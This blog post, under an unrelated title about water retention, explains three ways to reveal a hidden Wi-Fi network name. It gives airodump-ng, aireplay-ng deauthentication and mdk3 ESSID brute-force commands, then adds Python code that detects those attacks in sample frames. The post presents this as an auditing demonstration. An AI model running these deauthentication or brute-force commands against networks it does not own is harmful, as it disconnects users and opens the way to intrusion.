Wednesday, January 26, 2011

Why Water Retention When Traveling



Continuing with the next part on wireless insecurity, here are three very simple methods for discovering the name of a hidden network. Many networks rely on hiding the name to make themselves "secure", which is of little use, so we show below that this type of security is not so secure.
In the following example we use the BackTrack 4 (bt4) distribution and two wireless devices, to make the example easier to follow, although it can be done with a single card. As the client we have a PCI card with a Ralink 2561 chipset, interface wlan0.
The auditing card is a Realtek RTL8187B USB adapter, interface wlan1.
Method 1
The first method requires a lot of time, even hours: leave airodump-ng listening and wait for a real client to connect to the AP. When a client connects, airodump-ng captures the packet that carries the network name.
Remove the card's module:

rmmod rtl8187

Load the card's module again:

modprobe rtl8187

Put the card in monitor mode:

airmon-ng start wlan1

Start airodump-ng listening on the AP's channel (canal_AP) and BSSID (mac_AP):

airodump-ng --bssid mac_AP -c canal_AP mon0

Wait for a real client to connect to the AP.


Method 2
The second method is to carry out a deauthentication attack against a connected client.

rmmod rtl8187
modprobe rtl8187

airmon-ng start wlan1
airodump-ng --bssid mac_AP -c canal_AP mon0

Deauthentication attack against an associated client (mac_CLIENTE). In this case we send 5 deauthentication packets; if the client does not drop, send more.
aireplay-ng -0 5 -a mac_AP -c mac_CLIENTE mon0

The client is disconnected from the AP for a moment and reconnects, so it sends the packet with the AP's name.

Method 3

Here we use mdk3 to perform a brute-force attack (ESSID brute force). This attack does not need a connected client; it only tests whether the name is in the dictionary file it is given. mdk3 detects the length of the network name and only tries words of the detected length. The problem comes when airodump-ng shows networks with a network name length of -1 or 0 (the AP does not broadcast the length of the network name). This attack is used when the length of the network name is known; otherwise mdk3 does nothing. What we tried to do was modify the mdk3 source code so that the length defaults to a value we specify, but we could not even compile the mdk3 source code; it may be the kernel version. To avoid such problems use BackTrack, which includes mdk3 among its wireless auditing tools.


mdk3 interface p -t mac_AP -f directorio_diccionario.txt -s paquetesXsegundo

mdk3 also has other forms of brute-force search for the network name; mdk3 already has its own built-in dictionaries for this.
mdk3 interface p -c channel -t mac_AP -b tipo_caracteres -s paquetesXsegundo

l: network names with lowercase letters
u: network names with uppercase letters
n: names with numbers only
c: combination of lowercase and uppercase letters
m: combination of uppercase and lowercase letters and numbers
a: mix of letters, numbers and special characters
Here I show a small demonstration of methods 1 and 3; unfortunately my wicd would not associate with my only AP (TP-LINK TL-WA500G) at all, but apparently it is not needed because the method is very simple.
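To make the defender's side of the three methods concrete, here is an added example in Python that is not part of the original post: it runs simple detection logic over a constructed list of simplified 802.11 management-frame records, flagging a deauthentication burst aimed at one client (what Method 2 produces), a high-rate probe storm with many distinct SSIDs against one BSSID (what the mdk3 ESSID brute force of Method 3 produces), and the frames that carry the "hidden" name in the clear (what Method 1 waits for). The record format, thresholds and MAC addresses are invented for the example.

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 management frames, not a real capture. Each record is
# (time_s, subtype, src_mac, dst_mac, ssid); the MAC addresses are invented placeholders.
AP, CLIENT, ATTACKER = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01", "de:ad:be:ef:00:01"
FRAMES = (
    [(0.0, "beacon", AP, "ff:ff:ff:ff:ff:ff", "")]                          # hidden SSID: empty
    + [(0.5 + i * 0.01, "deauth", AP, CLIENT, None) for i in range(5)]       # 5 spoofed deauths
    + [(0.8, "assoc_req", CLIENT, AP, "MiRedOculta")]                        # client reconnects
    + [(2.0 + i * 0.003, "probe_req", ATTACKER, AP, f"guess{i}") for i in range(300)]
)

def max_in_window(times, window_s):
    """Largest number of timestamps that fall inside any window of window_s seconds."""
    best, recent = 0, deque()
    for t in sorted(times):
        recent.append(t)
        while recent[0] < t - window_s:
            recent.popleft()
        best = max(best, len(recent))
    return best

def deauth_bursts(frames, threshold=5, window_s=1.0):
    """(src, dst) pairs with >= threshold deauth frames inside window_s seconds (Method 2)."""
    times = defaultdict(list)
    for t, subtype, src, dst, _ in frames:
        if subtype == "deauth":
            times[(src, dst)].append(t)
    counts = {pair: max_in_window(ts, window_s) for pair, ts in times.items()}
    return {pair: n for pair, n in counts.items() if n >= threshold}

def probe_storms(frames, min_distinct=50, min_pps=100.0):
    """(src, dst) pairs probing one BSSID with many distinct SSIDs at a high rate (Method 3)."""
    probes = defaultdict(list)
    for t, subtype, src, dst, ssid in frames:
        if subtype == "probe_req" and ssid:
            probes[(src, dst)].append((t, ssid))
    alerts = {}
    for pair, entries in probes.items():
        distinct = len({ssid for _, ssid in entries})
        span = max(t for t, _ in entries) - min(t for t, _ in entries)
        pps = len(entries) / span if span > 0 else float("inf")
        if distinct >= min_distinct and pps >= min_pps:
            alerts[pair] = (distinct, pps)
    return alerts

def cleartext_ssid_leaks(frames):
    """Frames that carry the 'hidden' network name in the clear, i.e. what Method 1 waits for."""
    return [(src, dst, ssid) for _, subtype, src, dst, ssid in frames
            if subtype in ("assoc_req", "probe_resp") and ssid]

if __name__ == "__main__":
    print(deauth_bursts(FRAMES), probe_storms(FRAMES), cleartext_ssid_leaks(FRAMES))
```

Real deployments would feed the same functions from a monitor-mode capture parsed by a library rather than from the constructed records.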
